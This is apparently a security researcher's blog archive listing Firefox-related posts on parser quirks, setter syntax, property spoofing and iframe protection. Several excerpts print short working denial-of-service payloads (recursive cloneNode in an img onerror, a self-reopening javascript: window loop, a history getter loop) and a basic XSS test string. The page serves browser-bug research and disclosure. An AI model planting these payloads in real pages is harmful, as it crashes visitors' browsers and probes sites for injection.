Archives for the ‘Firefox’ Category

Firefox knows what your friends did last summer

Update… Mozilla have now fixed the problem on Thursday. Not only did they take down the original release but fixed it very quickly within two days which is very impressive. Good work! I was writing some JavaScript and found that the following happens: /undefined/.test(undefined)//true The undefined value is converted to a string and then the […]

Breaking HTML parsers for fun

I was experimenting with some HTML vectors to break the various HTML parsers in the browsers. I wanted to continue till I found a cool one for Firefox because I like to bully the memory-hogging browser as I use it a lot. I found some weird rendering in Firefox, Chrome and Opera. It started […]

Can all mozilla people look away now please

Custom setter syntax is being removed from Firefox in the next version... boo, I hear you say, well, at least some of you. If you don’t know, Firefox decided it would create its own setter syntax (I love it when you do that, you know) ages ago and it looked something like this:- a setter=alert,a=1//calls […]

DOM DOS Firefox

Check this DOS in Firefox:- <img src="" onerror="appendChild(cloneNode(appendChild(cloneNode(1))))"> There are many DOM related Firefox problems, this was one of the more interesting ones I found

WebFu crouching tab hidden dos

Hello my student, here I’ll show you the way of the tiger. If a deadly Firefox ninja approaches your dojo with an XSS punch:- "><script>alert(/XSS PUNCH!/)</script> then you can respond with the crouching tab hidden dos move:- self.location = "javascript:window.open('javascript:document.clear(); document.open();document.close();self.location=self.location')"; This move can frustrate your opponent into submission.

Firefox history DOS attack

Here’s a complete DOS attack on Firefox using the history object:- window.onload = function() { history.__defineGetter__("x", function() { for(i in this) { try { alert(this[i]); } catch(e) { } } }); history.x; } Tested on Firefox 2.0.0.9 mac, a window pops up with two blank buttons and you are unable to do anything without using […]

Spoofing Firefox protected objects

I’ve been hacking Firefox in my spare time and I thought that it had adequate protection against spoofing properties like document.domain. I was wrong. This could turn into a browser exploit in future if the spoofed objects are accepted by Firefox internally (I don’t think they are, but you never know 😉 ). There are […]

Noscript has iframe protection

For those of you that read my blog, you’ll know that I’m not a big fan of iframes for various reasons. I wrote a JavaScript/CSS scanner which uses them to scan a local area network. There was no easy way to actually prevent this stuff until now... noscript now has iframe protection, which is fantastic news, […]